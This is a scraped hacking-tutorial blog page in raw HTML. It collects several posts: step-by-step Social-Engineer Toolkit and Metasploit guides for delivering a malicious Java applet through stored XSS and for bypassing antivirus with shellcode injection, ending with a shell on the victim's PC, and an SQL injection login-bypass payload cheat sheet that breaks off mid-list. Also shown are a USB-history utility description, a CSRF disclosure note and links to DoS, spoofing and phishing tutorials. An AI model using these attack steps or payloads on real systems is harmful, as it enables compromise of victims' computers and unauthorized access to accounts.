Charter, serif;"><span style="font-size: medium;">(9)Put listener port:443 . Now metasploit will open.</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(10)<span style="font-style: normal;"><span style="font-weight: normal;">Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.</span></span></span></span></span><br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcLJmyXrRfkmssx_DkOVUqBgEMaHsYgI9tocm3CQXCizzbxpYdZ_coH4ss3w9ocnpRxoxA2g_Az6jareAHjU3AqLdthhVR-tV_Bur4NsPNbwMjQjZtphyOW9Bdib5Mm-Ta03cO90P7dwS/s1600/xss1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exploit-stored-xss-using-set" border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZcLJmyXrRfkmssx_DkOVUqBgEMaHsYgI9tocm3CQXCizzbxpYdZ_coH4ss3w9ocnpRxoxA2g_Az6jareAHjU3AqLdthhVR-tV_Bur4NsPNbwMjQjZtphyOW9Bdib5Mm-Ta03cO90P7dwS/s320/xss1.jpeg" title="exploit-stored-xss-using-set" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div> <span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;"></span></span>(11)<span style="font-style: normal;"><span style="font-weight: normal;">When a user will try to access the page that contains the malicious JavaScript the code will executed in his browser and a new window will come up that will contain the following message:</span></span></span></span></span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv_mKnTtaFerNt-r06_aTvl1Lzq32BkoSuNd531TIr9ouMfsCncY9CxW8Sa4yb7WadVP7r7FN3NWi3A-17EytjyResz4qMmZUmYHiKaP3r1WNqLOY-Q1jNQkglsr33gmPOdlxGCHIcN4-o/s1600/xss2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exploit-stored-xss-using-set" border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv_mKnTtaFerNt-r06_aTvl1Lzq32BkoSuNd531TIr9ouMfsCncY9CxW8Sa4yb7WadVP7r7FN3NWi3A-17EytjyResz4qMmZUmYHiKaP3r1WNqLOY-Q1jNQkglsr33gmPOdlxGCHIcN4-o/s320/xss2.jpeg" title="exploit-stored-xss-using-set-2" width="320" /></a></div><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">(12)After a while the user will notice a pop-up box that it will ask him if he wants to run the Java applet.</span></span></span></span></span><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEmk2qWcRrPF7S1NMtPQtTKHoWJ3ct_FjiPsL7nWnoMUAuLGx4x0_Ix4_74rjqbr3wIh2Eq6v1Jcu-s1XTVGh8nk9STJKztDhs64ra58tRLHzqnhaq85hcUojn3ROj2bhPHcA6fQl9kyhe/s1600/xss3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exploit-stored-xss-using-set" border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEmk2qWcRrPF7S1NMtPQtTKHoWJ3ct_FjiPsL7nWnoMUAuLGx4x0_Ix4_74rjqbr3wIh2Eq6v1Jcu-s1XTVGh8nk9STJKztDhs64ra58tRLHzqnhaq85hcUojn3ROj2bhPHcA6fQl9kyhe/s320/xss3.jpeg" title="exploit-stored-xss-using-set-3" width="320" /></a></div><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">(13)If the user press on the Run button the malicious code will executed and it will return us a shell.</span></span></span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(14)sessions -i 1</span></span></span></div>

How to exploit stored xss using S.E.T?

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page...

+ Read more »

How to view USB History of Windows PC?

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><style type="text/css"> <!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } H4 { margin-bottom: 0.08in } H4.ctl { font-family: "Lohit Hindi" } A:link { so-language: zxx } </style> </div><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.</span></span></span><br /><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.</span></span></span><br /><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.</span></span></span></span></span><br /><div style="margin-bottom: 0in; orphans: 2; widows: 2;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">                 <a href="http://www.nirsoft.net/utils/usbdeview.zip" target="_blank">Downloa<span style="font-size: medium;">d USBDevi<span style="font-size: medium;">ew For<span style="font-size: medium;"> X32 System</span></span></span></a></span></span></span></span></span></div><div style="margin-bottom: 0in; orphans: 2; widows: 2;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;"><span style="font-size: medium;"><span style="font-size: medium;"><span style="font-size: medium;">                <a href="http://www.nirsoft.net/utils/usbdeview-x64.zip" target="_blank"> <span style="font-size: medium;">Download USBDeview For <span style="font-size: medium;">X64 Syste<span style="font-size: medium;">m</span></span></span> </a></span></span></span></span></span></span></span></span><a href="http://www.nirsoft.net/utils/usbdeview-x64.zip" target="_blank"> </a> <br /><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.</span></span></span></div><div style="margin-bottom: 0in; orphans: 2; widows: 2;"><br /></div><div style="margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: navy;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;"><span style="font-weight: normal;">Connecting To Remote Computer</span></span></span></span></span></div><div style="font-style: normal; font-weight: normal; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">The following command-line options allows you to connect to remote computers. You must login to the remote computer with admin user in order to use these options.</span></span></span></div><ul><li><div style="font-style: normal; font-weight: normal; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b>/remote <\\Computer Name></b><br />Allows you to connect a single remote computer.<br />For Example:<br />USBDeview.exe /remote \\MyComp</span></span></span></div></li><li><div style="font-style: normal; font-weight: normal; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><b>/remotefile <Computers List File></b><br />Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple Ascii text file with computer names separated by colon, semicolon, space, tab characters or CRLF.<br />For Example:<br />USBDeview.exe /remotefile "c:\temp\comp.txt"</span></span></span><br /><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"></span></span></span><br /><a name='more'></a></div></li></ul><div style="orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">In order to successfully get full admin access to the remote computer, read this Blog post: </span></span></span></span></span><a href="http://blog.nirsoft.net/2009/10/22/how-to-connect-a-remote-windows-7vistaxp-computer-with-nirsoft-utilities/" target="remotecomp"><span style="color: #c020f0;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">How to connect a remote Windows 7/Vista/XP computer with NirSoft utilities</span></span></span></span></span></a><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-style: normal;"><span style="font-weight: normal;">.</span></span></span></span></span></div><h4 class="western" style="font-style: normal; orphans: 2; widows: 2;"><span style="color: navy;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Connecting To external SYSTEM registry file</span></span></span></h4><div style="orphans: 2; widows: 2;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;"><span style="font-style: normal;"><span style="font-weight: normal;">If you have the 'SYSTEM' registry file of external operating system, you can use the following command-line option to read the USB devices list from it: </span></span></span><br /><span style="color: black;"><span style="font-style: normal;"><b>/regfile <SYSTEM Registry File></b></span></span></span></span></div><div style="font-style: normal; font-weight: normal; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">For Example:<br />USBDeview.exe /regfile "c:\temp\regfiles\SYSTEM"<br />USBDeview.exe /regfile "d:\windows\system32\config\SYSTEM"</span></span></span></div><div style="font-style: normal; font-weight: normal; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">This option has some limitations:</span></span></span></div><ul><li><div style="font-style: normal; font-weight: normal; margin-bottom: 0in; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">You cannot read a Registry file of Windows XP/2003/Vista from Windows 2000 Machine.</span></span></span></div></li><li><div style="font-style: normal; font-weight: normal; orphans: 2; widows: 2;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">USBDeview works in read-only mode. (You cannot uninstall a device from external file) </span></span></span></div></li></ul></div>

How to view USB History of Windows PC?

USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you prev...

+ Read more »

Bypass Antivirus using S.E.T

<div dir="ltr" style="text-align: left;" trbidi="on">Bypass Antivirus using multyply injector shell code using SET & Metasploit.<br /><div style="text-align: left;"><br /></div><h3 style="text-align: left;">Requirement:-</h3><div style="text-align: left;"><br />Victim`s O.S.- windows.<br /><br />Attacker:- S.E.T ,Metasploit.<br /><br />(1)Open terminal & type following command<br /><br />sudo bash<br /><br />cd /opt/set<br /><br />./set<br /><br />(2)Now select option 1 social engineering attack<br /><br />(3)Select option 2 website attack vector<br /><br />(4)Now we will choose the option 1 the Java Applet Attack Method<br /><br />(5)Now we will choose option 2, “Site Cloner”<br /><br />(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)<br /><br />(7)Now choose 16 “Multi PyInjector Shellcode Injection”,<br /><br />(8)Port of the attacker computer. In this example I use port 443<br /><br />(9)Select the payload you want to deliver via shellcodeexec press enter here<br /><br />(10)Now again select Port of the attacker computer. In this example I use port 444 and 445<br /><br />(11)Select the payload you want to deliver via shellcodeexec press enter here<br /><br />(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc<br /><br />(13)sessions -l<br /><br />(14)sessions -i I.d</div></div>

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit. Requirement:- Victim`s O.S.- windows. Attacker:- S.E.T ,Meta...

+ Read more »

How To Find CSRF Vulnerabilites? - Twilio CSRF Attack [Demonstration]

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREUlSRap0CJ6gAoD_8o0w8q9WgJ7K1tfM2VXc4dNSoIdPKjQgg99_f-Nei6_i_Nfhhw6HyWyXUR5PWGNWl1e7HB4BVNt8eqIunnFF84L5QHyKWdbxxQHvcxLlCuh1OWKBNOfEGIu0f4g/s1600/twilio-logo+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREUlSRap0CJ6gAoD_8o0w8q9WgJ7K1tfM2VXc4dNSoIdPKjQgg99_f-Nei6_i_Nfhhw6HyWyXUR5PWGNWl1e7HB4BVNt8eqIunnFF84L5QHyKWdbxxQHvcxLlCuh1OWKBNOfEGIu0f4g/s320/twilio-logo+(1).png" width="320" /></a></div><br /><br />Recently, i wrote an article on the "<b><a href="http://www.rafayhackingarticles.net/2012/12/ifixitcom-stored-xss-vulnerability.html" target="_blank">ifixit Stored XSS vulnerability</a></b>". I received a good response from my readers, therefore i thought to write about my recent CSRF vulnerability i found inside twilio. Typically, when hunting for a CSRF vulnerability, we look for forms that are without CSRF tokens, I have created a small screencast, where i will walk you through the process of finding <a href="http://www.rafayhackingarticles.net/2012/11/website-hacking-csrf.html" target="_blank">CSRF</a> vulnerabilities. I would be using two different tools for this purpose namely "<b><a href="http://www.rafayhackingarticles.net/2012/11/website-hacking-csrf.html" target="_blank">Tamper Data</a></b>" and "<b>Burp Suite</b>", I hope you enjoy the video and i am looking forward to have a feedback.<br /><br /><a name='more'></a><br /><br /><iframe allowfullscreen="allowfullscreen" frameborder="0" height="300" mozallowfullscreen="mozallowfullscreen" src="http://player.vimeo.com/video/57054355" webkitallowfullscreen="webkitallowfullscreen" width="577"></iframe><br /><br />My name would be listed inside there responsible disclosure page, the name text page would be updated:<br /><b>https://www.twilio.com/docs/security/disclosure</b></div>

How To Find CSRF Vulnerabilites? - Twilio CSRF Attack [Demonstration]

Recently, i wrote an article on the " ifixit Stored XSS vulnerability ". I received a good response from my readers, therefore i t...

+ Read more »

List Of Vulnerability & it`s Tutorial.

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">It`s 100<sup>th</sup> post. When I started to write , I did not think that it may longer this.So today I don`t put any new article about hacking , I am gonna repeat some famous vulnerability which we had seen before.</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">In the chart , you can see that different types of vulnerability & it`s percentage which exists in website.</span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmTrJLIo5NC3G04qqJCKuK5PpszLeQNZtPNi4a4c9t7jfsk1aWre1Q1P9ix7OpBaizm5DH_qFbnF6VDzEdNo-1zorKHiTKor7_rL5LPn-MR-FPz_KcW8rlgkvJ9f41cPrXYIurDACCKhY/s1600/web-vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmTrJLIo5NC3G04qqJCKuK5PpszLeQNZtPNi4a4c9t7jfsk1aWre1Q1P9ix7OpBaizm5DH_qFbnF6VDzEdNo-1zorKHiTKor7_rL5LPn-MR-FPz_KcW8rlgkvJ9f41cPrXYIurDACCKhY/s320/web-vulnerability.jpg" width="320" /></a></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">This is web-browser vulnerability . So you can see that which browser is easy to hack.</span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgolU_qZUR-x1uXWk4OcwaIQ9mg9MwejoRgP43VmdZAJ4Bc_snBX3gYAapwX-H2YoF4rwtMP5b0Guus98H9tXOJntqJwpSuwDsRJWebY1-RzNsATREdu0PhCpq7899odFhVpp2DbMNeu0qF/s1600/web_vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgolU_qZUR-x1uXWk4OcwaIQ9mg9MwejoRgP43VmdZAJ4Bc_snBX3gYAapwX-H2YoF4rwtMP5b0Guus98H9tXOJntqJwpSuwDsRJWebY1-RzNsATREdu0PhCpq7899odFhVpp2DbMNeu0qF/s1600/web_vulnerability.jpg" /></a></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(A)S.Q.L. Injection:-</span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">It is a hacking method that allows an unauthorized attacker to access a database server. It is facilitated by a common coding blunder: the program accepts data from a client and executes SQL queries without first validating the client’s input. The attacker is then free to extract,modify, add, or delete content from the database. </span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on S.Q.L. Injection:-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html" target="_blank">S.Q.L. Injection manual</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)<a href="http://tipstrickshack.blogspot.in/2012/09/hacking-website-using-sql-injection.html" target="_blank">S.Q.L.Injection using Havij (For windows user)</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)<a href="http://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-from-linux.html" target="_blank">S.Q.Linjection using S.Q.L. Map (For linux user)</a></span></span></div><div style="margin-bottom: 0in;"></div><a name='more'></a><br /><br /><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(B)Cross Site Scripting:-</span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.</span></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on X.S.S-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/p/definition-ofxss-if-you-searchthe-web.html" target="_blank">BriefDescription on cross-site scripting</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)<a href="http://tipstrickshack.blogspot.com/2012/10/how-to-do-xss-attack-on-website.html" target="_blank">Howto find & Exploit cross-site scripting?</a></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(C)Cross site Request forgery:-</span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on C.S.R.F-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html" target="_blank">Howto find & exploit C.S.R.F.?</a></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">(D)Local File Inclusion:-</span></span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">Local File Inclusion (</span><span style="color: black;"><i>also known as LFI</i></span><span style="color: black;">) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.</span></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on local file inclusion-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/10/how-to-do-local-file-inclusion_17.html" target="_blank">Informationgathering using Local File Inclusion</a></span></span><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">(E)DOS Attack:-</span><span style="color: black;"> </span></span></span></h3><br /><div style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">A </span><span style="color: black;">denial-of-service attack</span><span style="color: black;">(</span><span style="color: black;">DoS attack</span><span style="color: black;">) or </span><span style="color: black;">distributed denial-of-service attack</span><span style="color: black;">(</span><span style="color: black;">DDoS attack</span><span style="color: black;">) is an attempt to make a machine or network resource unavailable to its intende</span><span style="color: black;">d user</span></span></span></div></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on DOS:-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/10/dos-attack-from-linux-using-hping3.html" target="_blank">DOSattack using Hping(For linux & windows user)</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)<a href="http://tipstrickshack.blogspot.com/2012/11/how-to-install-use-slowloris-in-ubuntu.html" target="_blank">DOSattack using slowloris(For linux user)</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)<a href="http://tipstrickshack.blogspot.com/2012/09/dos-attack-on-website.html" target="_blank">DOSattack using LOIC(For windows user)</a></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(F)Spoofing :- </span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">spoofing refers tricking or deceiving computer systems or other computer users. This is typically done by hiding one's identity or faking the identity of another user on the Internet.</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Spoofing Tutorial:-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/09/how-to-spoof-email-addresses.html" target="_blank">EmailSpoofing</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)<a href="http://tipstrickshack.blogspot.com/2012/12/how-to-install-configure-send-mail-in.html" target="_blank">Email Spoofing Using Sendmail</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(3)<a href="http://tipstrickshack.blogspot.com/2012/12/dns-poisoning-using-metasploit.html" target="_blank">D.N.S.Spoofing using METASPLOIT(Only for windows System)</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(4)<a href="http://tipstrickshack.blogspot.com/2012/12/dns-poisoning-using-batch-file.html" target="_blank">D.N.S.Spoofing using Batch file Virus(Only For windows system)</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(5)<a href="http://tipstrickshack.blogspot.com/2012/10/how-to-change-mac-address.html" target="_blank">MAC Spoofing</a></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><h3 style="text-align: left;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">(G)Phishing:-</span><span style="color: black;"> </span></span></span></h3><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="color: black;">P</span><span style="color: black;">hishing </span><span style="color: black;">is the act of attempting to acquire information such as </span><span style="color: black;">password ,</span><span style="color: black;">usernames, , and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity.</span></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Tutorial on Phishing-</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(1)<a href="http://tipstrickshack.blogspot.com/2012/08/gmail-phishing.html" target="_blank">Phishingtutorial</a></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">(2)<a href="http://tipstrickshack.blogspot.com/2013/01/tabnabbing-tutorial.html" target="_blank">Tab-nabbing using S.E.T.</a></span></span></div></div>

List Of Vulnerability & it`s Tutorial.

It`s 100 th post. When I started to write , I did not think that it may longer this.So today I don`t put any new article about hacking , I...

+ Read more »

Sql Injection Authentication bypass cheat sheet

<div dir="ltr" style="text-align: left;" trbidi="on"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.</span></span></span><span style="font-family: Bitstream Charter, serif; font-size: medium;">If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.</span><br /><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">or 1=1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">or 1=1--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">or 1=1#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">or 1=1/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' --</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' #</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin'/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or '1'='1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or '1'='1'--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or '1'='1'#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or '1'='1'/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin'or 1=1 or ''='</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or 1=1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or 1=1--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or 1=1#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin' or 1=1/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or ('1'='1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or ('1'='1'--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or ('1'='1'#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or ('1'='1'/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or '1'='1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: 